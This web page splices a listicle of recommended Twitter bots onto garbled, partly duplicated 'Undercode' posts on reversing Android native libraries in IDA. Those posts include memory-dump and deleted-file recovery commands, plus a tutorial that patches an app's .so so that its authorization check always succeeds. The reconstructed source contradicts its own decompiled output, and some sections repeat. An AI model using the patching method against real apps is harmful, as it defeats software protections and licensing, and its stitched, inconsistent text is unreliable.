Amazon has probably the biggest collection of eBooks. But if you're looking for some really good eBooks, they'll probably be paid, right? Not really, at least according to HundredZeros, which is a Twitterbot that regularly tweets links to the eBooks that are free on Amazon. This is a good example of a Twitter Bot which helps its followers. If you are an avid book reader, this is going to be one of the best Twitter Bots that you can follow.
2) @DearAssistant
Virtual assistants like Cortana, Siri, and Google Assistant Now are super cool in our smartphones, but what if you want some of that help on Twitter? No problem, as DearAssistant is there to help. Ask just about any question, and it will tweet a pretty detailed response quickly. You can ask queries like the distance between two places, the definition of specific terms, and things like that.
3) @WhatTheFare
Uber has revolutionized the way we book rides for commuting between different places. And if you quickly want to find out the Uber fare between two points, simply send a tweet to WhatTheFare, and the Twitterbot will tweet back with the estimated Uber fare between the specified pick-up and drop-off locations. All Uber cities are supported.
4) @wayback_exe
Ever wanted to know what came before the fancy websites and ultra-modern web browsers of the present? You need to follow wayback_exe, which is an amazing Twitterbot that generates screenshots of old websites in old browsers, and tweets them every two hours. It utilizes data from the Wayback Machine digital archive to do so.
5) @dscovr_epic
Although the entire space is incredibly amazing and beautiful, our Earth can be considered special, for it's our true home. And what better way to start (or end) the day than seeing that home from space? Follow the dscovr_epic bot, which tweets random images of the Earth, as captured by NASA's DSCOVR satellite, complete with the time and location over which they are taken. The images are breathtaking. This is one of my most favorite Twitter Bots.
6) @MagicRealismBot
Magic realism argues the acceptance of magic, as well as its importance in the real world. And if that's something you find quite funny, you are going to have a fun time reading the tweets made by the MagicRealismBot, which takes random practices or tasks, and over-exaggerates them with some sort of magic. It might not seem that way, but it's really funny.
7) @MuseumBot
Who doesn't like museums? They are fascinating places, depicting the amazing relics of our past, encompassing everything from art to history. This is why the MuseumBot is one Twitterbot that's absolutely worth following. It tweets a random, high-resolution image from the Metropolitan Museum of Art, four times a day.
8) @TwoHeadlines
Headlines are essential for keeping ourselves updated with the latest happenings around the world. But what happens when you take two completely unrelated headlines, and randomly mash them together? To find out, simply follow TwoHeadlines, which mixes headlines about two different topics and tweets the result. You'll have a hard time keeping yourself from bursting with laughter.
9) @pentametron
If you have a fascination with poetry, especially the works of the great William Shakespeare, pentametron is a no-brainer. While the Twitterbot does not exactly post tweets, it searches for tweets that have been written in iambic pentameter, and then re-tweets them one after another. Sounds confusing? Well, if you understand poetry and the nuances of English, it's amazing.
10) @EarthquakeBot
Earthquakes happen all around the world, and cause major destruction to life and property. And while natural disasters are beyond anyone's control, knowing about them in a timely manner can help. The EarthquakeBot is programmed to tweet any earthquakes that measure 5.0 or more on the Richter Scale, as they happen. Extremely useful, but this is one bot we'd want to stay as inactive as possible.
11) @_grammar_
Don't know about you guys, but as a self-proclaimed Grammar Nazi, this is my favorite Twitterbot. And if the name Grammar Police still doesn't explain everything, _grammar_ detects tweets that have improper usage of grammar, and then posts corrections. This one is a must for today's social-network-addicted generation.
12) @MoMARobot
MoMA Bot is one of my favorite Twitter Bots on this list. If you are someone who is interested in modern art, you will appreciate this bot. The bot basically tweets a random object from the collection of the Museum of Modern Art four times a day. The best part is that the tweet comes with the link of the object on the Museum of Modern Art's website, allowing you to check further information on the objects if you want to.
13) @netflix_bot
Want to keep yourself updated with the latest and greatest stuff coming up on Netflix? Follow netflix_bot, which tweets new releases on Netflix Instant as they happen. Perfect for all your binge watching needs.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android Android crack reverse analysis SO commonly used IDA analysis skills by UNDERCODE :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Creating and importing structures, structure pointers, etc.
Take JniNativeInterface and DexHeader as an example, with the function that parses the Dex viewed after F5 (decompile).
File -> Load file -> Parse C header file, and import Dex.h.
In the decompiled view, right-click a1, convert it to a structure, and select DexHeader.
2) Adjusting the number of parameters of a function pointer, variadic parameters, etc.
Take __android_log_print as an example: select the function, then
Edit -> Operand type -> Set operand type, and change the prototype to the following:
int (__cdecl *)(int, char *, char *, char *, int *, int *)
After refreshing with F5 the call is shown with the corrected arguments.
3) Switching between Thumb and ARM mode
Shortcut key ALT+G, where 0x01 is THUMB and 0x00 is ARM mode. Generally 4-byte instructions are ARM mode and 2-byte instructions are THUMB mode.
4) A function is mistaken for a chunk, resulting in multiple entries for the calling function.
Taking Java_by_Ericky_crackme01_JNI_EatRice as an example, you can see that there are two entries. The end of the first entry is a BX jump instruction; for the listing to be correct it should be allowed to jump to the second entry.
First remove the function tail: select the end, then Edit -> Functions -> Remove function tail.
Then change the jump instruction BL into a call: Edit -> Other -> Force BL call.
5) C++ RTTI, class name recognition.
In JNI_OnLoad, sub_A558 is the constructor; from it you can get the class name 9ArtLoader (the mangled form of ArtLoader).
6) Creating a function and setting the end address of the function.
When F5 fails on the selected code, the solution is to press P (create function) and then F5. If P has no effect, select the range first and then press P.
7) ELF repair: dump the .so and other files from memory, then set the base address of the dump when loading it with File -> Load file -> Binary file.
The dump command is:
dd if=/proc/1935/mem of=/sdcard/alimsc4 skip=1578049536 ibs=1 count=3993600
8) Data copying and patching.
Select the data, then Edit -> Export data.
9) Scripting: IDC, IDAPython
http://magiclantern.wikia.com/wiki/IDAPython/intro
http://drops.wooyun.org/tips/11849
http://drops.wooyun.org/tips/12060
10) lsof to view deleted files, cat to get deleted files back from memory
root@android:/ # lsof | busybox grep com.sxiaoao.car3d3
system_se 523 system 298 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 44 /data/data/com.sxiaoao.car3d3/files/app_sdk103700_.jar (deleted)
com.sxiao 10370 u0_a65 48 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 49 /data/app/com.sxiaoao.car3d3-2.apk
10370 is the process number and 44 is the fd of the open file. The fd is mapped under /proc/<pid>/fd.
Copy the file with the cat command:
root@android:/ # cat /proc/10370/fd/44 > /data/local/tmp/test.jar
11) ARM instruction simulator
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android crack reverse analysis: commonly used IDA analysis skills for SO files, by UNDERCODE :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Creating and importing structures, structure pointers, etc.
Take JniNativeInterface and DexHeader as examples.
The function that parses the Dex is as follows:
After F5:
File -> Load file -> Parse C header file, and import Dex.h.
In the picture above, right-click a1, convert it to a structure, and select DexHeader.
2) Adjusting the number of parameters of a function pointer, variadic parameters, etc.
Take __android_log_print as an example: select this function, then
Edit -> Operand type -> Set operand type, and change the prototype to:
int (__cdecl *)(int, char *, char *, char *, int *, int *). After refreshing with F5, the effect is as follows:
3) Switching between Thumb and ARM mode.
Shortcut ALT+G (change segment register) sets the T register: 0x01 is Thumb mode and 0x00 is ARM mode. As a rule of thumb, 4-byte instructions are ARM mode and 2-byte instructions are Thumb mode (Thumb-2 also has 4-byte encodings, so check the T register when unsure), for example:
4) A function is mistaken for a chunk, producing multiple entries for the caller function.
Taking Java_by_Ericky_crackme01_JNI_EatRice as an example, you can see that there are two entries.
The first entry ends in a BX jump instruction; to be correct, it should jump to the second entry.
First, the function tail must be removed:
select the tail, then Edit -> Functions -> Remove function tail. The effect:
Then change the BL jump instruction into a call: Edit -> Other -> Force BL call. The effect:
5) C++ RTTI and class name recognition.
In JNI_OnLoad,
sub_A558 is the constructor.
From it you can get the class name 9ArtLoader (the mangled form of ArtLoader).
6) Creating a function and setting its end address.
After F5, the effect is as follows:
Solution: press P, then F5. If P has no effect, select the range first and then press P.
7) ELF repair: dump the .so (or another file) from process memory, then fix up the base address of the dump and load it with File -> Load file -> Binary file.
The dump command is (skip is counted in ibs units, so with ibs=1 it is the byte offset at which the mapping starts, and count is the mapping's length in bytes):
dd if=/proc/1935/mem of=/sdcard/alimsc4 skip=1578049536 ibs=1 count=3993600
8) Copying data and patching.
Select the data, then Edit -> Export data, then
9) Scripting: IDC and IDAPython
http://magiclantern.wikia.com/wiki/IDAPython/intro
http://drops.wooyun.org/tips/11849
http://drops.wooyun.org/tips/12060
10) lsof shows deleted files; cat recovers a deleted file from memory.
root@android:/ # lsof | busybox grep com.sxiaoao.car3d3
system_se 523 system 298 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 44 /data/data/com.sxiaoao.car3d3/files/app_sdk103700_.jar (deleted)
com.sxiao 10370 u0_a65 48 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 49 /data/app/com.sxiaoao.car3d3-2.apk
10370 is the process ID and 44 is the fd of the open file. Open fds are exposed under /proc/<pid>/fd, and a deleted file can still be read through its fd as long as the process keeps it open.
Copy the file with the cat command:
root@android:/ # cat /proc/10370/fd/44 > /data/local/tmp/test.jar
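The lsof step above can be automated. The following Python is an added example, not code from the post: it parses the lsof lines quoted above (embedded here as constructed sample input), keeps only the entries marked (deleted), and returns the /proc/<pid>/fd/<fd> path that the cat step reads from. It assumes the five-column layout shown above (COMMAND PID USER FD NAME).

```python
# Added example (not from the post): find files that lsof reports as deleted
# but still open, and compute the /proc path through which they can be read.
import re

# Constructed sample input: the lsof lines quoted in the post.
SAMPLE_LSOF = """\
system_se 523 system 298 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 44 /data/data/com.sxiaoao.car3d3/files/app_sdk103700_.jar (deleted)
com.sxiao 10370 u0_a65 48 /data/app/com.sxiaoao.car3d3-2.apk
com.sxiao 10370 u0_a65 49 /data/app/com.sxiaoao.car3d3-2.apk
"""

# COMMAND PID USER FD NAME; the FD column may carry a mode suffix (e.g. 44u),
# and NAME may contain spaces, so it is matched lazily up to the optional marker.
LINE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<fd>\d+)\w*\s+"
    r"(?P<name>.+?)(?P<deleted>\s+\(deleted\))?$"
)

def deleted_open_files(lsof_output):
    """Return [(pid, fd, path, proc_fd_path)] for every deleted-but-open file."""
    found = []
    for line in lsof_output.splitlines():
        m = LINE.match(line.strip())
        if not m or not m.group("deleted"):
            continue          # unparsable line, or the file still exists on disk
        pid, fd = int(m.group("pid")), int(m.group("fd"))
        found.append((pid, fd, m.group("name"), f"/proc/{pid}/fd/{fd}"))
    return found

if __name__ == "__main__":
    for pid, fd, path, proc_path in deleted_open_files(SAMPLE_LSOF):
        print(f"pid {pid} fd {fd}: {path} -> readable via {proc_path}")
```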
11) arm instruction simulator
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦New Android packing and cracking: statically modifying .so files, commonly used cracking methods, last tutorial by undercode, PART 1
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Tool introduction
IDA 6.5, for static analysis of .so files
010 Editor, to modify the hexadecimal bytes of the .so file
Android Killer, an Android decompilation tool
2) Modifying the SO
The project is the key code of an Android JNI demo. Use AndroidKiller to open the app, find the corresponding .so library, and get the package name of the current program:
cn.com.location.hshelldemo
> Source code (the native side of the demo; the LOGE macro and the RET_OK value are reconstructed from the decompiled output further down, where the log tag is "native-lib-jni" and the check compares against 10000):
#include <jni.h>
#include <string>
#include <android/log.h>

// Error-level log line tagged "native-lib-jni", as seen in the decompiled output.
#define LOGE(...) __android_log_print(ANDROID_LOG_ERROR, "native-lib-jni", __VA_ARGS__)
#define RET_OK 10000        // the decompiler shows the check as v5 == 10000

int getAuthInfo(int);       // the check routine, defined elsewhere in the library

extern "C" JNIEXPORT jstring JNICALL
Java_cn_com_location_hshelldemo_MainActivity_stringFromJNI(
        JNIEnv *env,
        jobject /* this */) {
    std::string hello = "Hello from C++";
    int ret = getAuthInfo(10000);
    if (ret == RET_OK) {
        LOGE(" !!!Check successfully\n");
    } else {
        LOGE(" !!!Check failed\n");
    }
    if (ret != RET_OK) {
        LOGE(" =====Check successfully\n");
    } else {
        LOGE(" =====Check failed\n");
    }
    return env->NewStringUTF(hello.c_str());
}
Open the .so in IDA, then go to Options | General;
3) Click a function on the left and press Ctrl+F, then type java to search. This is how to find the JNI interface;
π¦Example :
1) Click the interface that was found, double-click to see the assembly, and press F5 to get the C pseudocode (the C view is very important: even without understanding much assembly, you can basically still follow the C):
2) The F5 pseudocode:
jstring __fastcall Java_cn_com_location_hshelldemo_MainActivity_stringFromJNI(JNIEnv *env, jobject a2)
{
unsigned __int8 *bytes; // ST0C_4
jstring result; // r0
_jstring *v4; // [sp+8h] [bp-78h]
int v5; // [sp+58h] [bp-28h]
_JNIEnv *v6; // [sp+68h] [bp-18h]
std::allocator<char> v7; // [sp+6Ch] [bp-14h]
std::basic_string<char,std::char_traits<char>,std::allocator<char> > v8; // [sp+70h] [bp-10h]
int v9; // [sp+74h] [bp-Ch]
v6 = env;
std::allocator<char>::allocator(&v7);
std::string::string(&v8, "Hello from C++", &v7);
std::allocator<char>::~allocator(&v7);
v5 = getAuthInfo(10000);
if ( v5 == 10000 )
_android_log_print(6, "native-lib-jni", " !!!Check successfully\n");
else
_android_log_print(6, "native-lib-jni", " !!!Check failed\n");
if ( v5 != 10000 )
_android_log_print(6, "native-lib-jni", " =====Check failed\n");
else
_android_log_print(6, "native-lib-jni", " =====Check successfully\n");
bytes = (unsigned __int8 *)std::string::c_str(&v8);
v4 = _JNIEnv::NewStringUTF(v6, bytes);
std::string::~string(&v8);
result = (jstring)_stack_chk_guard;
if ( _stack_chk_guard == v9 )
result = v4;
return result;
}
3) It can be seen that it is basically the same as the source code above, which is why many algorithm libraries are packed nowadays; otherwise they are easy to crack.
What we actually want to do is invert the check if (v5 == 10000), so that the check succeeds;
4) Here is the key code:
loc_4346
11 98 LDR R0, [SP,#0x80+var_3C]
16 90 STR R0, [SP,#0x80+var_28]
16 99 LDR R1, [SP,#0x80+var_28]
42 F2 10 72 MOVW R2, #0x2710
91 42 CMP R1, R2
1C D1 BNE loc_438E
5) BNE means branch if not equal: if R1 and R2, compared by the CMP instruction on the previous line, are not equal, execution jumps to loc_438E and the failure message is printed. Of course, under normal operation the two values are simply not equal.
6) It can be seen that the machine code corresponding to the jump instruction B is E7. What we have to do now is change the instruction at 4350 to B loc_4356, which jumps straight to the normal path without evaluating the CMP instruction on the previous line.
Use the 010 Editor to modify the .so.
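The immediates and the branch target in the listing can be checked by hand from the Thumb encodings. The following Python decoder is an added example, not code from the tutorial: it takes the opcode bytes from the listing above, assumes loc_4346 is the address of the first LDR and derives the other addresses from the instruction sizes shown, and confirms that 42 F2 10 72 encodes MOVW R2, #0x2710 and that 1C D1 is a BNE whose target resolves to loc_438E.

```python
# Added example (not from the tutorial): decode the Thumb opcode bytes in the listing
# above. Assumption: loc_4346 is the address of the first LDR; the other addresses
# follow from the instruction sizes in the listing.
COND = ["EQ", "NE", "CS", "CC", "MI", "PL", "VS", "VC",
        "HI", "LS", "GE", "LT", "GT", "LE", "AL"]

def sign_extend(value, bits):
    return value - (1 << bits) if value & (1 << (bits - 1)) else value

def decode_thumb(data, off, addr):
    """Decode one instruction at data[off], located at address addr -> (size, text).
    Only the encodings occurring in the listing are handled; others are shown raw."""
    hw1 = int.from_bytes(data[off:off + 2], "little")   # IDA prints bytes in memory order
    if (hw1 >> 11) in (0b11101, 0b11110, 0b11111):      # 32-bit Thumb-2 encoding
        hw2 = int.from_bytes(data[off + 2:off + 4], "little")
        # MOVW Rd, #imm16 (T3):  11110 i 100100 imm4 | 0 imm3 Rd imm8
        if (hw1 & 0xFBF0) == 0xF240 and not (hw2 & 0x8000):
            imm16 = ((hw1 & 0xF) << 12) | (((hw1 >> 10) & 1) << 11) \
                    | (((hw2 >> 12) & 7) << 8) | (hw2 & 0xFF)
            return 4, f"MOVW R{(hw2 >> 8) & 0xF}, #0x{imm16:X}"
        return 4, f"<thumb32 {hw1:04X} {hw2:04X}>"
    if (hw1 & 0xF000) == 0x9000:                        # LDR/STR Rt, [SP, #imm8*4]
        op = "LDR" if hw1 & 0x0800 else "STR"
        return 2, f"{op} R{(hw1 >> 8) & 7}, [SP,#0x{(hw1 & 0xFF) * 4:X}]"
    if (hw1 & 0xFFC0) == 0x4280:                        # CMP Rn, Rm (T1)
        return 2, f"CMP R{hw1 & 7}, R{(hw1 >> 3) & 7}"
    cond = (hw1 >> 8) & 0xF
    if (hw1 & 0xF000) == 0xD000 and cond < 0xE:         # B<cond> label (T1)
        target = addr + 4 + sign_extend(hw1 & 0xFF, 8) * 2   # PC reads as addr + 4
        return 2, f"B{COND[cond]} loc_{target:X}"
    if (hw1 & 0xF800) == 0xE000:                        # B label (T2), 11-bit imm
        return 2, f"B loc_{addr + 4 + sign_extend(hw1 & 0x7FF, 11) * 2:X}"
    return 2, f"<thumb16 {hw1:04X}>"

def disassemble(data, base):
    """Walk the buffer; returns [(address, text)] for every instruction."""
    out, off = [], 0
    while off < len(data):
        size, text = decode_thumb(data, off, base + off)
        out.append((base + off, text))
        off += size
    return out

# Opcode bytes copied from the listing at loc_4346: LDR, STR, LDR, MOVW, CMP, BNE.
LISTING = bytes.fromhex("1198 1690 1699 42F21072 9142 1CD1")

if __name__ == "__main__":
    for addr, text in disassemble(LISTING, 0x4346):
        print(f"{addr:X}  {text}")    # last line: 4352  BNE loc_438E
```

The SP offsets it prints (0x44 and 0x58) are the 0x80+var_3C and 0x80+var_28 of the listing, and the MOVW immediate 0x2710 is the 10000 compared in the pseudocode.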
> part 1 done
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β